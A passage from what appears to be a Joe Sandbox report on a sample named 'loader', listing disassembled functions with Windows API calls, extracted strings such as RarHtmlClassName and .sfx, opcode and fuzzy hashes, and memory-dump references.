                                                                                    • Instruction ID: f47a386db7b617271a8081077fd0a9483dc84bc2ed6448bca03c9723d3c63a52
                                                                                    • Opcode Fuzzy Hash: a8e72c82e617bdaea83afc7580cfe9a49c098682fdacccc18689ca9e244f14c4
                                                                                    • Instruction Fuzzy Hash: 933148325483117ED725AF249C06FAB7B9E9F43721F14051EF802962D2EF609A0983BA
                                                                                    Function 00631100 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: Ud$pd$zd
                                                                                    • API String ID: 176396367-3915611454
                                                                                    • Opcode ID: a07dae50d0d7cb3a811be493124abf2281faa4ff55bf2fdc20295570a21d613f
                                                                                    • Instruction ID: b25e27db4d39c34dcb312030a009b722d7b411e2d644723572ab507ff3ca424f
                                                                                    • Opcode Fuzzy Hash: a07dae50d0d7cb3a811be493124abf2281faa4ff55bf2fdc20295570a21d613f
                                                                                    • Instruction Fuzzy Hash: A241B3719006699BCB619F688C0A9EF7BBDEF01311F00002EFD46E7345DE30AE498AE4
                                                                                    Function 00649ED5 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ShowWindow.USER32(?,00000000), ref: 00649EEE
                                                                                    • GetWindowRect.USER32(?,00000000), ref: 00649F44
                                                                                    • ShowWindow.USER32(?,00000005,00000000), ref: 00649FDB
                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00649FE3
                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00649FF9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Show$RectText
                                                                                    • String ID: d$RarHtmlClassName
                                                                                    • API String ID: 3937224194-1757021614
                                                                                    • Opcode ID: 7289af701e0488d0f53d3d6017d41eab85de58d3c0a8e1566b2156c23175948f
                                                                                    • Instruction ID: 9655929f323d7075787537863544c91c3f8d947e6a3cd28775b5f5cdf35457be
                                                                                    • Opcode Fuzzy Hash: 7289af701e0488d0f53d3d6017d41eab85de58d3c0a8e1566b2156c23175948f
                                                                                    • Instruction Fuzzy Hash: 1541B131048320EFCB615FA4EC49B6B7BAAFF49705F00455AF8499A266CB34D909CB66
                                                                                    Function 00632210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _swprintf.LIBCMT ref: 00632536
                                                                                      • Part of subcall function 00634092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006340A5
                                                                                      • Part of subcall function 006405DA: _wcslen.LIBCMT ref: 006405E0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                    • String ID: ;%u$x%u$xc%u
                                                                                    • API String ID: 3053425827-2277559157
                                                                                    • Opcode ID: 99dfe9f531ec0694521f299d8861214ca23b20da605cb0bb15eed938a214bb0c
                                                                                    • Instruction ID: 31acfa59e027b18b4b8ef824d19f3f9680bd8b0d30348394db8e6492342f67ad
                                                                                    • Opcode Fuzzy Hash: 99dfe9f531ec0694521f299d8861214ca23b20da605cb0bb15eed938a214bb0c
                                                                                    • Instruction Fuzzy Hash: 8FF1F7706083419BDB15DB2888A5BFE77DB6F91300F08056DFD86AB383CB649949C7E6
                                                                                    Function 0064A80C Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 237COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0064A699: GetDC.USER32(00000000), ref: 0064A69D
                                                                                      • Part of subcall function 0064A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0064A6A8
                                                                                      • Part of subcall function 0064A699: ReleaseDC.USER32(00000000,00000000), ref: 0064A6B3
                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 0064A83C
                                                                                      • Part of subcall function 0064AAC9: GetDC.USER32(00000000), ref: 0064AAD2
                                                                                      • Part of subcall function 0064AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0064AB01
                                                                                      • Part of subcall function 0064AAC9: ReleaseDC.USER32(00000000,?), ref: 0064AB99
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: ObjectRelease$CapsDevice
                                                                                    • String ID: "d$($Ad$lUf
                                                                                    • API String ID: 1061551593-3154586099
                                                                                    • Opcode ID: 6b1ba84a56e58b5529a796954c564ab7ff1b8eb4011843fe869df0ad2c7e29c0
                                                                                    • Instruction ID: 834e7f2313b1707ad89ff7ec6c05e0845becba8ea2bb03f853e123ab8e8c1d54
                                                                                    • Opcode Fuzzy Hash: 6b1ba84a56e58b5529a796954c564ab7ff1b8eb4011843fe869df0ad2c7e29c0
                                                                                    • Instruction Fuzzy Hash: FB91E071608354AFD710DF65C854A6BBBFAFF88700F00591EF59AD3260DB70AA46CB62
                                                                                    Function 00649CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: </p>$</style>$<br>$<style>$>
                                                                                    • API String ID: 176396367-3568243669
                                                                                    • Opcode ID: 226b6a78aacfbd22f2a18c742261ec492f7aa19de2d46c0d59b3f1aeb148a402
                                                                                    • Instruction ID: c55946c4c020ee4141e1f60c4a58772fa2a84139b9feb8ed6a0803422bcde424
                                                                                    • Opcode Fuzzy Hash: 226b6a78aacfbd22f2a18c742261ec492f7aa19de2d46c0d59b3f1aeb148a402
                                                                                    • Instruction Fuzzy Hash: 6351F766BC072395DB34AA659811BF773E3DFA1790F69042AF9C18B3C0FB658C818275
                                                                                    Function 00652900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00652937
                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0065293F
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 006529C8
                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 006529F3
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00652A48
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                    • String ID: csm
                                                                                    • API String ID: 1170836740-1018135373
                                                                                    • Opcode ID: 69a3909d4cdd450d4826000630f4ff31296aa8ace3a40d63b0a83cb2b5629ac9
                                                                                    • Instruction ID: ea27628494ac5957f99d46c90064c91a222d28663c1397612d7201975dcf7bc7
                                                                                    • Opcode Fuzzy Hash: 69a3909d4cdd450d4826000630f4ff31296aa8ace3a40d63b0a83cb2b5629ac9
                                                                                    • Instruction Fuzzy Hash: 64410634A0021AAFCF10DF69C891ADE7BB2EF45325F148159EC156B392D771DA09CF90
                                                                                    Function 00649955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                    • API String ID: 176396367-3743748572
                                                                                    • Opcode ID: f9aee7bad32b14f8ed5ff6356a1a5187b3cad849cc0b4c33c756a88708a8759b
                                                                                    • Instruction ID: ef9559074dca2d11c0a0b088a626925dcda191cc52832c19032ddbd4320f635d
                                                                                    • Opcode Fuzzy Hash: f9aee7bad32b14f8ed5ff6356a1a5187b3cad849cc0b4c33c756a88708a8759b
                                                                                    • Instruction Fuzzy Hash: 6E310A326843455ADB34AB549C42BB773A6EB50720F54441FF88697380FB50ADC983B5
                                                                                    Function 0064AAC9 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 0064AAD2
                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 0064AB01
                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0064AB99
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: ObjectRelease
                                                                                    • String ID: -d$7d$d
                                                                                    • API String ID: 1429681911-2951457888
                                                                                    • Opcode ID: 9e062a8342086c3c1f652eff8ea1378270e996587c64415f489d9b1e9935cf52
                                                                                    • Instruction ID: 10d2a980f8ddad9cc50c434ed58772d1feb09543770a4d7c1a3ba97feab9ae0f
                                                                                    • Opcode Fuzzy Hash: 9e062a8342086c3c1f652eff8ea1378270e996587c64415f489d9b1e9935cf52
                                                                                    • Instruction Fuzzy Hash: 7B212872108314BFD3019FA5DC48E6FBFEEFB89355F04192AFA46D2620D7319A548B62
                                                                                    Function 0063C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 006405DA: _wcslen.LIBCMT ref: 006405E0
                                                                                      • Part of subcall function 0063B92D: _wcsrchr.LIBVCRUNTIME ref: 0063B944
                                                                                    • _wcslen.LIBCMT ref: 0063C197
                                                                                    • _wcslen.LIBCMT ref: 0063C1DF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$_wcsrchr
                                                                                    • String ID: .exe$.rar$.sfx
                                                                                    • API String ID: 3513545583-31770016
                                                                                    • Opcode ID: 10d45d905cf5c6b1f153aa3c43829892897ddf323edeeb66c7c32f31f571e3ed
                                                                                    • Instruction ID: 6d2fdbf66f9d26c5c82a5dd6020b0f5fd81c6923a219b9ff475861f2ad23e878
                                                                                    • Opcode Fuzzy Hash: 10d45d905cf5c6b1f153aa3c43829892897ddf323edeeb66c7c32f31f571e3ed
                                                                                    • Instruction Fuzzy Hash: 80417A2650036199D735AF748852ABBB3EBEF41764F10090EF9D27B2C1EB614E82D3D9
                                                                                    Function 0064CE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0063B690: _wcslen.LIBCMT ref: 0063B696
                                                                                    • _swprintf.LIBCMT ref: 0064CED1
                                                                                      • Part of subcall function 00634092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006340A5
                                                                                    • SetDlgItemTextW.USER32(?,00000066,0067946A), ref: 0064CEF1
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0064CF22
                                                                                    • EndDialog.USER32(?,00000001), ref: 0064CFFE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: DialogItemText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                                                    • String ID: %s%s%u
                                                                                    • API String ID: 3419047066-1360425832
                                                                                    • Opcode ID: 7021b74e99074cccc0bf62e7524521d19013539118f767b2287b99e613a18f3b
                                                                                    • Instruction ID: e46cdc16e587e71298022d304a4f77ffd16ceabd8edab4eb73edead416143cb7
                                                                                    • Opcode Fuzzy Hash: 7021b74e99074cccc0bf62e7524521d19013539118f767b2287b99e613a18f3b
                                                                                    • Instruction Fuzzy Hash: 0C418071900218AADF65DF90CC45AEE77FEEB06350F4080A6FA09E7251EE749A84CF65
                                                                                    Function 0064CD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0064CD84
                                                                                      • Part of subcall function 0064AF98: _wcschr.LIBVCRUNTIME ref: 0064B033
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcschr
                                                                                    • String ID: <$HIDE$MAX$MIN
                                                                                    • API String ID: 2691759472-3358265660
                                                                                    • Opcode ID: 4d7967b46aab2fbf78c126767377486578a5d880d639b35f8429d0caffb58d11
                                                                                    • Instruction ID: 858d9982833ff0019a6f7021543d7bf03fb50297a44d563db8e67770a5ae3a3d
                                                                                    • Opcode Fuzzy Hash: 4d7967b46aab2fbf78c126767377486578a5d880d639b35f8429d0caffb58d11
                                                                                    • Instruction Fuzzy Hash: 2D319671900219AADF65CF50CC41EEE73BEEB15760F404566E505E7280EBB0DE848FA5
                                                                                    Function 0064B270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00631316: GetDlgItem.USER32(00000000,00003021), ref: 0063135A
                                                                                      • Part of subcall function 00631316: SetWindowTextW.USER32(00000000,006635F4), ref: 00631370
                                                                                    • EndDialog.USER32(?,00000001), ref: 0064B2BE
                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0064B2D6
                                                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 0064B304
                                                                                    Strings
                                                                                    Memory Dump Source
